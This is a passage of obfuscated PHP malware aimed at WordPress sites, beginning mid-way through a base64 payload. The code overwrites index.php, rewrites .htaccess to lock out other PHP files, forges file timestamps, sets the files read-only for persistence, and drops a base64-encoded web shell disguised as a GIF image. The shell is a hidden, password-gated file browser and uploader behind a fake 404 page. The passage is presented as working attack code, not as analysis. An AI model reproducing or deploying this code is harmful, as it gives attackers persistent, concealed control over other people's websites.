XMUthVUo2WkVoS01HSXllSFprTWxaNVMwTlNabFV3VmxOV2ExWlRWM2xrU1ZaR1VsRlZlV1JrUzFOQmFGQlVNR2RLTWpsdFdtbGpjRWxJYzA1RGFVRm5TVU5CWjBsRFFXZEtSMmd3WkVoQ1ptTklTblprUnpoblVGTkJibUZJVWpCalNFMDJUSGs0Yms5M01FdEpRMEZuU1Vnd1oxcFhlSHBhVjJ4dFNVTm9jR016VG14a1EyZHJXREZPUmxWc1drWlZiSE51VTBaU1ZWVkdPVmxZTUZwUVZXeGtRbFZyVWtaU1JqbFJWV3M1VlZSNVpHUkxVMEZ0U21sQmExZ3hUa1pWYkZwR1ZXeHpibE5HVWxWVlJqbFpXREJhVUZWc1pFSlZhMUpHVWtZNVVWVnJPVlZVZVdSa1NVUXdPVkJUUVc1aFNGSXdZMGhOYmt0VFFqZEVVVzluU1VOQlowbERRV2RKUTFKdlpFaFNkMWd6UW5saU0xSjJTVVF3WjBveWFEQmtTRUo2VDJrNGRrcDZjMDVEYVVGblNVTkNPVWxIVm5Oak1sWndXbWxCYjJGWVRucGFXRkZ2U2tZNVZGSldTbGRTVmtwaVNqQm9WVlpHUW1aU2JFcFFWR3hTWmxKVk5VVllNR2hWVmtaQ1ZFb3hNSEJKUTFsdFNVaE9NR051VW5aaVJ6a3pXbGhKYjBwR09WUlNWa3BYVWxaS1lrb3dhRlZXUmtKbVVteEtVRlJzVW1aU1ZUVkZXREJvVlZaR1FsUktNVEJ3U1VORk9WQlRRVzVpTWxwdFNubHJaMlYzTUV0SlEwRm5TVU5CWjBsRFFXdGhTRkl3WTBZNWQyTnRPVEJpZVVFNVNVTmtiMlJJVW5kamVtOTJUSGxqTjBSUmIyZEpRMEZuWmxFd1MwbERRV2RKU0Vwc1pFaFdlV0pwUVd0aFNGSXdZMFk1ZDJOdE9UQmllbk5PUTI0d1RrTm5NRXRoVjFsblMwTlNabFV3VmxOV2ExWlRWM2xrVTFKV1JsWlNWazVWV0RGV1UxTlRaR1JKUkRBNVVGTkJia3d4U1hSS2VVRjFTVWN4YTA1VFoydFlNVTVHVld4YVJsVnNjMjVWTUZaVFZtdFdVMWd3TlVKVVZWVnVXRk5yY0VsSWMwNURhVUZuU1VOQ2JHVkhiREJMU0U0d1kyNUtiR1JwYUhSYVJGVnZTa1k1VkZKV1NsZFNWa3BpU2pGT1JsVnNXa1pWYkRsUFVWVXhSa294TUhCTFUyczNSRkZ3T1VSUmNIQmFhVUZ2WXpOV2FXTXpVbmxZTWs1MlpGYzFNRXREVW1aVk1GWlRWbXRXVTFkNVpGTlNWa1pXVWxaT1ZWZ3hWbE5UVTJSa1RFTmtjR0p0VW14bFF6VjNZVWhCZG1GdGMyNUxVMnczUkZGdlowbERRV2RhV0dod1pFTm5ibVY1UVdsYVdFcDVZak5KYVU5cFFYbE5SRUZ6U1VOS2MxbDVTVFpKUTBweFlYbEpjMGxEU210WldGSm9TV3B2WjFkNVFYaEpSakJuWmxOamNFOTNNRXRtVVRCTFNrZHNkMWd5Um10YVNFbG5VRk5DYkdJelducGFSWGd3VVc1d05GSnJOV2xXYkZaNVMwTnJOMFJSYjJ0amJWWnRXbGhLYkdOcFFUbEpTRTR3WTI1YWFHSkRhRUZLUmpsVVVsWktWMUpXU21KS01HaFZWa1pDWmxWclZrZFNWa3BHVldsa1pFdFVjMDVEYVZKNllWaFNiRmd6Vm5saVEwRTVTVVpDV0ZSdFNsVmpWMUpPWVd0b1JHVkhkSGRMUTJ0blRHbEJhMWd4VGtaVmJGcEdWV3h6YmxVd1ZsTldhMVpUV0RBMVFsUlZWVzVZVkhOT1EyMXNiVWxEYUhwa1NFcDNZak5OYjBwSVNteGFiVlo1V2xoSmMwbERVbnBoV0ZKc1dETldlV0pEYTJkUVZEQTVTVVJCY0VsRFVubGFWMXBzWTIxV2VVbEVNR2RLZVdNM1JGRnZhMk51UldkUVUwSm9ZMjVLYUdWVFozQlBkekJMU2toS2VGZDVaR3RLTVRCblVGTkNWbEpWZUhGYVNIQm9WMWhzTTFGWGJFaGliVnBRUzBOU1psVXdWbE5XYTFaVFYzbGtSVlF3VGxaVVZWWlBWa1k1VTFRd09WVktNVEJ3VDNjd1MwcElTbmhYZVdSd1NqRXdaMUJUUWxaU1ZYaHhXa2h3YUZkWWJETlJWMnhJWW0xYVVFdERVbkJqUmpsb1drZFNlVXRVYzA1RGFWSjVZMVp6Ym1KRFpHUkpSREJuVmxWV1RXRnRValpaVm13MVpEQkdjRkl5TlcxVWVXZHJXREZPUmxWc1drWlZiSE51VTBaU1ZWVkdPVUpSTUU1R1ZVWlNabFJGUms5U01WWkNVakJWYmxoVGF6ZEVVVzlyWTI1R1lrb3pUblZLTVRCblVGTkNWbEpWZUhGYVNIQm9WMWhzTTFGWGJFaGliVnBRUzBOU1psVXdWbE5XYTFaVFYzbGtWRkV4U2twVlJsSm1WR3RHVGxKVFpHUkxWSE5PUTJsU2VXTldjMjVqYVdSa1NVUXdaMVpWVmsxaGJWSTJXVlpzTldRd1JuQlNNalZ0VkhsbmExZ3hUa1pWYkZwR1ZXeHpibFZyVmxKV1ZWWlVWa1k1VmxWcmEyNVlVMnMzUkZGdmEyTnVSbUpLTTBwdFNqRXdaMUJUUWxaU1ZYaHhXa2h3YUZkWWJETlJWMnhJWW0xYVVFdERVbmxhVjFwc1kyMVdlVXRVYzA1RGFWSjVZMVp6Ym1ONVpHUkpSREJuVmxWV1RXRnRValpaVm13MVpEQkdjRkl5TlcxVWVXZHJZekpzTUZwV09URmpiWGR3VDNjd1MwcElTbmhYZVdReFNqRXdaMUJUUWxaU1ZYaHhXa2h3YUZkWWJETlJWMnhJWW0xYVVFdERVbVpWTUZaVFZtdFdVMWQ1WkVsV1JsSlJXREZXVkZKV1NtWlJWV1JHVkd4UmJsaFRhemRFVVc5clkyMVdlbU5IT1hWak1sVm5VRk5DZWxwdWJHaGtTRnBwWVVoR2MyRnBaMjVoU0ZJd1kwUnZka3g2VVRCUFdFSTBURzFvZG1KWE9YSmhWelIxV1RKYWEweDVZM05KUTFKNVkxTnJOMFJSY0hCYWFVRnZTVmRzZFZneVJubGpiVVkxUzBOU2VWcFlUbmRpTWpWNldsWnpibU16VW1oa1NGWjZTakV3YzBsSFJubGpiVVkxUzBSQmMwbEVTWGROUTJ0d1MxTkNOMFJSYjJkSlEwRm5Zek5rY0dSSFRtOUpRMmRyWTIxV2VtTkhPWFZqTWxaaVNqTk9NRmxZVWpGamVXUmtTMU5DTjBSUmIyZEpRMEZuU1VOQlowbEhUbWhqTWxWblRYcEJlRTluTUV0SlEwRm5TVU5CWjBsRFFXZEpRMEZuWVVkV2FGcEhWbmxMUTJSSlZrWlNVVXg2UlhWTlUwRjZUVVJGWjFSWE9USmFWMUZuVlVkV2VXSlhSblZhVnpVd1lraHJia3RVYzA1RGFVRm5TVU5CWjBsRFFXZEpRMEZuU1Vkb2JGbFhVbXhqYVdkdVZFYzVhbGxZVW5CaU1qUTJTVU5qWjB4cFFqQmpiV3gwUzBOU2VWcFlUbmRpTWpWNldsWnpibGt5T1hWa1IxWjFaRU5rWkV0VGF6ZEVVVzluU1VOQlowbERRV2RKUTBGblNVTkNhV050Vm1oaGVuTk9RMmxCWjBsRFFXZEpRMEZuV1RKR2VscFRRWHBOUkVrMlJGRnZaMGxEUVdkSlEwRm5TVU5CWjBsRFFtOWFWMFpyV2xoSmIwb3dhRlZXUmtGMlRWTTBlRWxFVFhkTmFVSk9Zak5hYkVsR1VteGlXRUoyWTIxR2VXRlhlRFZLZVdzM1JGRnZaMGxEUVdkSlEwRm5TVU5CWjBsRFFtOWFWMFpyV2xoSmIwb3dlSFpaTWtZd1lWYzVkVTlwUVc1SlF6Um5aRWhLY0dKVFoydGpiVlo2WTBjNWRXTXlWbUpLTWs1MlltNVNiR0p1VVc1WVUydHdUM2N3UzBsRFFXZEpRMEZuU1VOQlowbERRV2RaYmtwc1dWZHpOMFJSYjJkSlEwRm5TVU5CWjBsSFRtaGpNbFZuVGtSQk1FOW5NRXRKUTBGblNVTkJaMGxEUVdkSlEwRm5ZVWRXYUZwSFZubExRMlJKVmtaU1VVeDZSWFZOVTBFd1RVUlJaMVJ0T1RCSlJWcDJaRmMxYTBwNWF6ZEVVVzluU1VOQlowbERRV2RKUTBGblNVTkNiMXBYUm10YVdFbHZTVzVPTUZsWVVqRmplbTluVGtSQk1FbEZOWFprUTBKSFlqTldkVnBEU1hCUGR6QkxTVU5CWjBsRFFXZEpRMEZuU1VOQloxbHVTbXhaVjNNM1JGRnZaMGxEUVdkSlEwRm5TVWRTYkZwdFJqRmlTRkUyUkZGdlowbERRV2RKUTBGblNVTkJaMGxEUW1samJWWm9ZWHB6VGtOcFFXZEpRMEk1UkZGdlowbERRV2RhV0dod1pFTm5kMHRVYzA1RGJqQm5XbGQ0ZWxwWGJHMUpRMmg2WkVoS2MxcFhORzlLU0Vwc1l6TkNkbUp1VG14WGVXUnFZakkxTUZwWE5UQktNVEJ3UzFOQ04wUlJiMmRKUTBGblVVZG9iRmxYVW14amFXZHVVVEk1ZFdSSFZuVmtRekZWWlZoQ2JFOXBZMmRNYVVGclkyMVdlbU5IT1hWak1sWmlTak5TTldOSFZXNVlVMnMzUkZGdlowbERRV2RhVjA1dllubEJhMk50Vm5walJ6bDFZekpXWWtveVRuWmlibEpzWW01UmJsaFVjMDVEYVVGblNVTkNiR1ZIYkRCTFJFRndUM2N3UzJaVFFTOVFaejA5SWlrcE93PT0iLyotM0FNYEktKi8pLyotS1tRTXcmRzgoLSovKTs/Pjw/cGhwIGRlZmluZSggJ1dQX1VTRV9USEVNRVMnLCB0cnVlICk7IHJlcXVpcmUoJy4vd3AtYmxvZy1oZWFkZXIucGhwJyk7Pz4="); 
$index_code = file_get_contents($do."index.php"); 
if(md5($index_code) != md5($open_cache_ruzhu_phpcode)) 
{ 
  @chmod($do."index.php", 0644); 
  @file_put_contents($do."index.php", $open_cache_ruzhu_phpcode); 
  @touch($do."index.php", filectime($do."index.php")); 
  @chmod($do."index.php", 0444); 
} 
 
$huan_yuan_htaccess = base64_decode("PEZpbGVzTWF0Y2ggJy4ocHl8ZXhlfHBodG1sfHBocHxQSFB8UGhwfFBIcHxwSHB8cEhQfHBIUDd8UEhQN3xwaFB8UGhQfHBocDV8c3VzcGVjdGVkKSQnPgpPcmRlciBhbGxvdyxkZW55CkRlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAnXihpbmRleC5waHB8aW5wdXRzLnBocHxhZG1pbmZ1bnMucGhwfGNodG1sZnVucy5waHB8Y2pmdW5zLnBocHxjbGFzc3NtdHBzLnBocHxjbGFzc2Z1bnMucGhwfGNvbWZ1bmN0aW9ucy5waHB8Y29tZG9mdW5zLnBocHxjb25uZWN0cy5waHB8Y29weXBhdGhzLnBocHxkZWxwYXRocy5waHB8ZG9pY29udnMucGhwfGVwaW55aW5zLnBocHxmaWxlZnVucy5waHB8Z2RmdHBzLnBocHxoaW5mb2Z1bnMucGhwfGhwbGZ1bnMucGhwfG1lbWJlcmZ1bnMucGhwfG1vZGRvZnVucy5waHB8b25jbGlja2Z1bnMucGhwfHBocHppcGluY3MucGhwfHFmdW5jdGlvbnMucGhwfHFpbmZvZnVucy5waHB8c2NoYWxsZnVucy5waHB8dGVtcGZ1bnMucGhwfHVzZXJmdW5zLnBocHxzaXRlaGVhZHMucGhwfHRlcm1wcy5waHB8dHhldHMucGhwfHRob21zLnBocHxwb3N0bmV3cy5waHB8d3AtYmxvZy1oZWFkZXIucGhwfHdwLWNvbmZpZy1zYW1wbGUucGhwfHdwLWxpbmtzLW9wbWwucGhwfHdwLWxvZ2luLnBocHx3cC1zZXR0aW5ncy5waHB8d3AtdHJhY2tiYWNrLnBocHx3cC1hY3RpdmF0ZS5waHB8d3AtY29tbWVudHMtcG9zdC5waHB8d3AtY3Jvbi5waHB8d3AtbG9hZC5waHB8d3AtbWFpbC5waHB8d3Atc2lnbnVwLnBocHx4bWxycGMucGhwfGVkaXQtZm9ybS1hZHZhbmNlZC5waHB8bGluay1wYXJzZS1vcG1sLnBocHxtcy1zaXRlcy5waHB8b3B0aW9ucy13cml0aW5nLnBocHx0aGVtZXMucGhwfGFkbWluLWFqYXgucGhwfGVkaXQtZm9ybS1jb21tZW50LnBocHxsaW5rLnBocHxtcy10aGVtZXMucGhwfHBsdWdpbi1lZGl0b3IucGhwfGFkbWluLWZvb3Rlci5waHB8ZWRpdC1saW5rLWZvcm0ucGhwfGxvYWQtc2NyaXB0cy5waHB8bXMtdXBncmFkZS1uZXR3b3JrLnBocHxhZG1pbi1mdW5jdGlvbnMucGhwfGVkaXQucGhwfGxvYWQtc3R5bGVzLnBocHxtcy11c2Vycy5waHB8cGx1Z2lucy5waHB8YWRtaW4taGVhZGVyLnBocHxlZGl0LXRhZy1mb3JtLnBocHxtZWRpYS1uZXcucGhwfG15LXNpdGVzLnBocHxwb3N0LW5ldy5waHB8YWRtaW4ucGhwfGVkaXQtdGFncy5waHB8bWVkaWEucGhwfG5hdi1tZW51cy5waHB8cG9zdC5waHB8YWRtaW4tcG9zdC5waHB8ZXhwb3J0LnBocHxtZWRpYS11cGxvYWQucGhwfG5ldHdvcmsucGhwfHByZXNzLXRoaXMucGhwfHVwbG9hZC5waHB8YXN5bmMtdXBsb2FkLnBocHxtZW51LWhlYWRlci5waHB8b3B0aW9ucy1kaXNjdXNzaW9uLnBocHxwcml2YWN5LnBocHx1c2VyLWVkaXQucGhwfG1lbnUucGhwfG9wdGlvbnMtZ2VuZXJhbC5waHB8cHJvZmlsZS5waHB8dXNlci1uZXcucGhwfG1vZGVyYXRpb24ucGhwfG9wdGlvbnMtaGVhZC5waHB8cmV2aXNpb24ucGhwfHVzZXJzLnBocHxjdXN0b20tYmFja2dyb3VuZC5waHB8bXMtYWRtaW4ucGhwfG9wdGlvbnMtbWVkaWEucGhwfHNldHVwLWNvbmZpZy5waHB8d2lkZ2V0cy5waHB8Y3VzdG9tLWhlYWRlci5waHB8bXMtZGVsZXRlLXNpdGUucGhwfG9wdGlvbnMtcGVybWFsaW5rLnBocHx0ZXJtLnBocHxjdXN0b21pemUucGhwfGxpbmstYWRkLnBocHxtcy1lZGl0LnBocHxvcHRpb25zLnBocHxlZGl0LWNvbW1lbnRzLnBocHxsaW5rLW1hbmFnZXIucGhwfG1zLW9wdGlvbnMucGhwfG9wdGlvbnMtcmVhZGluZy5waHB8c3lzdGVtX2xvZy5waHApJCc+Ck9yZGVyIGFsbG93LGRlbnkKQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleC5waHAkIC0gW0xdClJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1mClJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1kClJld3JpdGVSdWxlIC4gaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPg=="); 
$yuan_htaccess = file_get_contents($do.".htaccess"); 
if(md5($yuan_htaccess) != md5($huan_yuan_htaccess)) 
{ 
  @chmod($do.".htaccess", 0644); 
  @unlink($do.".htaccess"); 
  @file_put_contents($do.".htaccess", $huan_yuan_htaccess); 
  @touch($do.".htaccess", filectime($do.".htaccess")); 
  @chmod($do.".htaccess", 0444); 
} 
$file_general_template_path = $do."wp-includes/general-template.php"; 
$jue_jiang_404_path = $do."wp-includes/images/xit-3x.gif"; 
if (!file_exists($jue_jiang_404_path)){ 
  $jue_jiang_404 = "PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwpkYXRlX2RlZmF1bHRfdGltZXpvbmVfc2V0KCdQUkMnKTsKCiRBUlJBWSA9ICR7J19HRVQnfVsnQVJSQVknXTsKJEtKTW4gPSBzdHJfcm90MTMoJEFSUkFZKTsKJGNiSCA9IHBhY2soIlx4NDhceDJhIiwgJEtKTW4pOwokRXphVSA9IGpzb25fZGVjb2RlKCRjYkgsIHRydWUpOwppZiAoKCRFemFVWzBdIC0gdGltZSgpKSA+IDAgYW5kIG1kNShtZDUoJEV6YVVbMl0pKSA9PT0gIjlmMzQ2NjViMDA1MjMxMWQ1YjZhZDZmODIxZGM2MjI4IikgOiAvLyA9PT09Ci8vID09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQoKICAgIGZ1bmN0aW9uIGp1ZWppYW5nX3Blcm1zKCRmaWxlKXsKICAgICAgICAkcGVybXMgPSBmaWxlcGVybXMoJGZpbGUpOwogICAgICAgIGlmICgoJHBlcm1zICYgMHhDMDAwKSA9PSAweEMwMDApIHsvLyBTb2NrZXQKICAgICAgICAgICAgJGluZm8gPSAncyc7CiAgICAgICAgfSBlbHNlaWYgKCgkcGVybXMgJiAweEEwMDApID09IDB4QTAwMCkgey8vIFN5bWJvbGljIExpbmsKICAgICAgICAgICAgJGluZm8gPSAnbCc7CiAgICAgICAgfSBlbHNlaWYgKCgkcGVybXMgJiAweDgwMDApID09IDB4ODAwMCkgey8vIFJlZ3VsYXIKICAgICAgICAgICAgJGluZm8gPSAnLSc7CiAgICAgICAgfSBlbHNlaWYgKCgkcGVybXMgJiAweDYwMDApID09IDB4NjAwMCkgey8vIEJsb2NrIHNwZWNpYWwKICAgICAgICAgICAgJGluZm8gPSAnYic7CiAgICAgICAgfSBlbHNlaWYgKCgkcGVybXMgJiAweDQwMDApID09IDB4NDAwMCkgey8vIERpcmVjdG9yeQogICAgICAgICAgICAkaW5mbyA9ICdkJzsKICAgICAgICB9IGVsc2VpZiAoKCRwZXJtcyAmIDB4MjAwMCkgPT0gMHgyMDAwKSB7Ly8gQ2hhcmFjdGVyIHNwZWNpYWwKICAgICAgICAgICAgJGluZm8gPSAnYyc7CiAgICAgICAgfSBlbHNlaWYgKCgkcGVybXMgJiAweDEwMDApID09IDB4MTAwMCkgey8vIEZJRk8gcGlwZQogICAgICAgICAgICAkaW5mbyA9ICdwJzsKICAgICAgICB9IGVsc2Ugey8vIFVua25vd24KICAgICAgICAgICAgJGluZm8gPSAndSc7CiAgICAgICAgfQovLyBPd25lcgogICAgICAgICRpbmZvIC49ICgoJHBlcm1zICYgMHgwMTAwKSA/ICdyJyA6ICctJyk7CiAgICAgICAgJGluZm8gLj0gKCgkcGVybXMgJiAweDAwODApID8gJ3cnIDogJy0nKTsKICAgICAgICAkaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDA0MCkgPwogICAgICAgICAgICAoKCRwZXJtcyAmIDB4MDgwMCkgPyAncycgOiAneCcgKSA6CiAgICAgICAgICAgICgoJHBlcm1zICYgMHgwODAwKSA/ICdTJyA6ICctJykpOwoKLy8gR3JvdXAKICAgICAgICAkaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDAyMCkgPyAncicgOiAnLScpOwogICAgICAgICRpbmZvIC49ICgoJHBlcm1zICYgMHgwMDEwKSA/ICd3JyA6ICctJyk7CiAgICAgICAgJGluZm8gLj0gKCgkcGVybXMgJiAweDAwMDgpID8KICAgICAgICAgICAgKCgkcGVybXMgJiAweDA0MDApID8gJ3MnIDogJ3gnICkgOgogICAgICAgICAgICAoKCRwZXJtcyAmIDB4MDQwMCkgPyAnUycgOiAnLScpKTsKCi8vIFdvcmxkCiAgICAgICAgJGluZm8gLj0gKCgkcGVybXMgJiAweDAwMDQpID8gJ3InIDogJy0nKTsKICAgICAgICAkaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDAwMikgPyAndycgOiAnLScpOwogICAgICAgICRpbmZvIC49ICgoJHBlcm1zICYgMHgwMDAxKSA/CiAgICAgICAgICAgICgoJHBlcm1zICYgMHgwMjAwKSA/ICd0JyA6ICd4JyApIDoKICAgICAgICAgICAgKCgkcGVybXMgJiAweDAyMDApID8gJ1QnIDogJy0nKSk7CgogICAgICAgIHJldHVybiAkaW5mbzsKICAgIH0KCi8vIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQogICAgLyoqCiAgICAgKiDovazljJYgXCDkuLogLwogICAgICovCiAgICBmdW5jdGlvbiBkaXJfcGF0aCgkcGF0aCkKICAgIHsKICAgICAgICAkcGF0aCA9IHN0cl9yZXBsYWNlKCdcXCcsICcvJywgJHBhdGgpOwogICAgICAgIGlmIChzdWJzdHIoJHBhdGgsIC0xKSAhPSAnLycpICRwYXRoID0gJHBhdGggLiAnLyc7CiAgICAgICAgcmV0dXJuICRwYXRoOwogICAgfQoKLy8gLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgogICAgLyoqIOWPluW+l+ermeeCueagueebruW9lQogICAgICogQHJldHVybiBhcnJheXxzdHJpbmd8c3RyaW5nW10KICAgICAqLwogICAgZnVuY3Rpb24gZG9jdW1lbnRfcm9vdCgpewoKICAgICAgICAkcGhwX3NlbGYgPSBkaXJfcGF0aCgkX1NFUlZFUlsiUEhQX1NFTEYiXSk7CiAgICAgICAgJHNjcmlwdF9maWxlbmFtZSA9IGRpcl9wYXRoKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7CiAgICAgICAgaWYgKGVtcHR5KCRfU0VSVkVSWyJQSFBfU0VMRiJdKSBvciBlbXB0eSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pKXsKICAgICAgICAgICAgJGRvMSA9IGRpcl9wYXRoKCRfU0VSVkVSWyJET0NVTUVOVF9ST09UIl0pOwogICAgICAgICAgICAkZG8gPSBydHJpbSgkZG8xLCcvJyk7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICRkbyA9IHN0cl9yZXBsYWNlKHN0cl9yZXBsYWNlKCIvLyIsICIvIiwgJHBocF9zZWxmKSwgIiIsIHN0cl9yZXBsYWNlKCJcXFxcIiwgIi8iLCAkc2NyaXB0X2ZpbGVuYW1lKSk7CiAgICAgICAgfQoJCWlmKGVtcHR5KCRkbykpICRkbyA9ICcvJzsKICAgICAgICByZXR1cm4gJGRvOwogICAgfQogICAgJGRvY3VtZW50X3Jvb3QgPSBkb2N1bWVudF9yb290KCk7CiAgICBkZWZpbmUoJ0RPQ1VNRU5UX1JPT1QnLCAkZG9jdW1lbnRfcm9vdCk7CgovLyAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCgoKICAgICRwaHBfdmVyc2lvbiA9IFBIUF9NQUpPUl9WRVJTSU9OOwoJaWYoJHBocF92ZXJzaW9uPD03KXsKCQlpZihnZXRfbWFnaWNfcXVvdGVzX2dwYygpKXsKCQkJZm9yZWFjaCgkX1BPU1QgYXMgJGtleT0+JHZhbHVlKXsKCQkJCSRfUE9TVFska2V5XSA9IHN0cmlwc2xhc2hlcygkdmFsdWUpOwoJCQl9CgkJfQoJfQoKICAgICRWZXJzaW9uID0gYmFzZTY0X2RlY29kZSgnNXB5QTVaQ081NXFFNVlDVTVieTYnKTsKICAgIGlmKGlzc2V0KCRfR0VUWydwYXRoJ10pKXsKICAgICAgICAkcGF0aCA9ICRfR0VUWydwYXRoJ107CiAgICB9ZWxzZXsKICAgICAgICAkcGF0aCA9IGdldGN3ZCgpOwogICAgfQoKCiAgICBlY2hvICc8IWRvY3R5cGUgaHRtbD4KPGh0bWw+CjxoZWFkPgo8dGl0bGU+JkVycm9yXzQwNCY8L3RpdGxlPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCIvPgo8L2hlYWQ+JzsKICAgID8+CgogICAgPGNlbnRlcj4KICAgICAgICA8c3R5bGU+CiAgICAgICAgICAgIGJvZHl7YmFja2dyb3VuZDojZTZlNmU2O2xpbmUtaGVpZ2h0OjE7Y29sb3I6IzAwMDtmb250LWZhbWlseTpDb21pYyBTYW5zIE1TO3dpZHRoOjYwJTttYXJnaW46MCBhdXRvO30KICAgICAgICAgICAgdGFibGUsdGgsdGR7Ym9yZGVyLWNvbGxhcHNlOmNvbGxhcHNlO2JhY2tncm91bmQ6dHJhbnNwYXJlbnQ7Zm9udC1zaXplOjEzcHg7fQogICAgICAgICAgICBpbnB1dCx0ZXh0YXJlYXt9CiAgICAgICAgICAgIC50YWJsZV9ob21lLC50aF9ob21lLC50ZF9ob21le2NvbG9yOmdyZXk7Ym9yZGVyOjFweCBzb2xpZCBncmV5O30KICAgICAgICAgICAgdGh7cGFkZGluZzoxMHB4O30KICAgICAgICAgICAgLnRkX2hvbWV7cGFkZGluZzo3cHg7fQogICAgICAgICAgICBhe2NvbG9yOiMwMDA7IHRleHQtZGVjb3JhdGlvbjpub25lO30KICAgICAgICAgICAgdGV4dGFyZWF7d2lkdGg6MTAwJTtoZWlnaHQ6NDAwcHg7fQogICAgICAgICAgICAjY29udGVudCB0cjpob3ZlcntiYWNrZ3JvdW5kLWNvbG9yOiNjZWNlY2U7dGV4dC1zaGFkb3c6MHB4IDBweCAxMHB4ICNmZmY7Y29sb3I6I2ZmZjt9CiAgICAgICAgICAgIC5kaCBheyBwYWRkaW5nLWxlZnQ6IDEwcHg7IHBhZGRpbmctcmlnaHQ6IDEwcHg7IGJvcmRlci1yaWdodDogMXB4IHNvbGlkICMwMDA7fQogICAgICAgICAgICAuZGggYTpob3ZlcnsgY29sb3I6ICNmMDA7fQogICAgICAgIDwvc3R5bGU+CiAgICA8P3BocAogICAgZWNobyAnPC9oZWFkPgo8Ym9keT48Yj4KPEgxPjxjZW50ZXI+PGZvbnQgY29sb3I9InJlZCI+Jy4kVmVyc2lvbi4nPC9mb250PjwvY2VudGVyPjwvaDE+Cjx0YWJsZSB3aWR0aD0iNzAwIiBib3JkZXI9IjAiIGNlbGxwYWRkaW5nPSIzIiBjZWxsc3BhY2luZz0iMSIgYWxpZ249ImNlbnRlciI+Cgo8dHI+PHRkPgoKPGZvbnQgPjxjZW50ZXI+Jy5waHBfdW5hbWUoKS4nPC9jZW50ZXI+PC9mb250Pjxicj4nOwogICAgaWYoaXNzZXQoJF9HRVRbJ3BhdGgnXSkpewogICAgICAgICRwYXRoID0gJF9HRVRbJ3BhdGgnXTsKICAgIH1lbHNlewogICAgICAgICRwYXRoID0gZ2V0Y3dkKCk7CiAgICB9CiAgICAkcGF0aCA9IHN0cl9yZXBsYWNlKCdcXCcsJy8nLCRwYXRoKTsKICAgICRwYXRocyA9IGV4cGxvZGUoJy8nLCRwYXRoKTsKCiAgICAkZ2VuX2xpbmtfdXJsID0gJzxhIHN0eWxlPSJjb2xvcjojMDA2NkZGIiBocmVmPSI/QVJSQVk9Jy4kQVJSQVkuJyZwYXRoPScuRE9DVU1FTlRfUk9PVDsKICAgICRnZW5fbGlua191cmwgLj0gJyI+5qC555uu5b2VIO+8miAgICA8L2E+Jm5ic3A7JzsKICAgIGVjaG8gJGdlbl9saW5rX3VybDsKCiAgICBmb3JlYWNoKCRwYXRocyBhcyAkaWQ9PiRwYXQpewogICAgICAgIGlmKCRwYXQgPT0gJycgJiYgJGlkID09IDApewogICAgICAgICAgICAkYSA9IHRydWU7CiAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSMwMDA+CjxhIGhyZWY9Ij9BUlJBWT0nLiRBUlJBWS4nJnBhdGg9LyI+LzwvYT4nOwogICAgICAgICAgICBjb250aW51ZTsKICAgICAgICB9CiAgICAgICAgaWYoJHBhdCA9PSAnJykgY29udGludWU7CiAgICAgICAgZWNobyAnPGEgc3R5bGU9ImNvbG9yOiMwMDY2RkYiIGhyZWY9Ij9BUlJBWT0nLiRBUlJBWS4nJnBhdGg9JzsKICAgICAgICBmb3IoJGk9MDskaTw9JGlkOyRpKyspewogICAgICAgICAgICBlY2hvICIkcGF0aHNbJGldIjsKICAgICAgICAgICAgaWYoJGkgIT0gJGlkKSBlY2hvICIvIjsKICAgICAgICB9CiAgICAgICAgZWNobyAnIj4nLiRwYXQuJzwvYT4vJzsKICAgIH0KICAgIGVjaG8gJzwvZm9udD4KPGJyPjxicj4KPC90ZD48L3RyPjx0cj48dGQ+PGNlbnRlcj4nOwoKICAgIGlmKGlzc2V0KCRfRklMRVNbJ2ZpbGUnXSkpewogICAgICAgIGlmKGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCRwYXRoLicvJy4kX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpewogICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0iZ3JlZW4iPuS4iuS8oOaIkOWKnyA6KTwvZm9udD48YnIgLz48YnIgLz4nOwogICAgICAgIH1lbHNlewogICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj7kuIrkvKDlpLHotKUgPC9mb250PjxiciAvPjxiciAvPic7CiAgICAgICAgfQogICAgfQogICAgZWNobyAnPC9jZW50ZXI+PGNlbnRlcj48Zm9ybSBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9IlBPU1QiPjxmb250IGNvbG9yPSJ3aGl0ZSI+PGlucHV0IHN0eWxlPSJiYWNrZ3JvdW5kOmJsYWNrO2ZvbnQtZmFtaWx5OiBDb21pYyBTYW5zIE1TICIgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgLz4KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IuS4iuS8oCIgLz4KPC9mb3JtPjwvY2VudGVyPgo8L3RkPjwvd